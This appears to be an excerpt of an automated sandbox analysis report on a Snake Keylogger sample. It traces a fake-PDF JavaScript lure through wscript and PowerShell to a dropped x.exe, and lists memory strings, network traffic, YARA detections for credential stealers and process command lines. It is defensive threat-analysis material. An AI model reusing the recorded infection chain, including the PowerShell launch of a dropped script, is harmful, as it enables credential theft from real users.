                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CAE000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: x.exe, 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002CD5000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CAE000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: x.exe, 0000000B.00000002.2543408283.0000000003EBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002CF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Powershell drops PE file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E9084810_2_00E90848
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E97AE810_2_00E97AE8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E91DD010_2_00E91DD0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E9850810_2_00E98508
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E9981010_2_00E99810
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E97ADA10_2_00E97ADA
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E984F810_2_00E984F8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E995E810_2_00E995E8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E995D910_2_00E995D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E997C410_2_00E997C4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECA08811_2_00ECA088
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECC14611_2_00ECC146
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECD27811_2_00ECD278
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC537011_2_00EC5370
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECC73811_2_00ECC738
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC29E011_2_00EC29E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC69A011_2_00EC69A0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECE98811_2_00ECE988
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECCA0811_2_00ECCA08
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECCCD811_2_00ECCCD8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC3E0911_2_00EC3E09
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC6FC811_2_00EC6FC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECCFAA11_2_00ECCFAA
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECF96011_2_00ECF960
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00ECE97A11_2_00ECE97A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06842A9011_2_06842A90
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684966811_2_06849668
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06841FA811_2_06841FA8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684185011_2_06841850
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06849D3811_2_06849D38
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684514811_2_06845148
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684DAC311_2_0684DAC3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684DAC811_2_0684DAC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684D21811_2_0684D218
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684D66011_2_0684D660
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684D67011_2_0684D670
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06841F9C11_2_06841F9C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684E7CB11_2_0684E7CB
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684E7D011_2_0684E7D0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684DF1311_2_0684DF13
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684DF2011_2_0684DF20
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06840B2011_2_06840B20
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06840B3011_2_06840B30
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684E36B11_2_0684E36B
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684E37811_2_0684E378
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684F08011_2_0684F080
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_06848CC011_2_06848CC0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684F4C811_2_0684F4C8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684F4D811_2_0684F4D8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684000711_2_06840007
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684EC1811_2_0684EC18
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684EC2811_2_0684EC28
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684004011_2_06840040
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684184111_2_06841841
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684CDAF11_2_0684CDAF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684CDC011_2_0684CDC0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684F92111_2_0684F921
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684F93011_2_0684F930
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684513F11_2_0684513F
                  Source: PO-2513203-PDF.jsInitial sample: Strings found which are bigger than 50
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTRMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, B.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, --.csBase64 encoded string: 'QMP5+Zav3OUq9OOcYs5CdQwVhfNast3/xEa0tVdiWYy4PoureKQ0hNBDRbWFjees'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@8/8@3/4
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\believe[1].ps1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\WTRTRWFSHS.ps1Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: PO-2513203-PDF.jsVirustotal: Detection: 17%
                  Source: PO-2513203-PDF.jsReversingLabs: Detection: 18%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
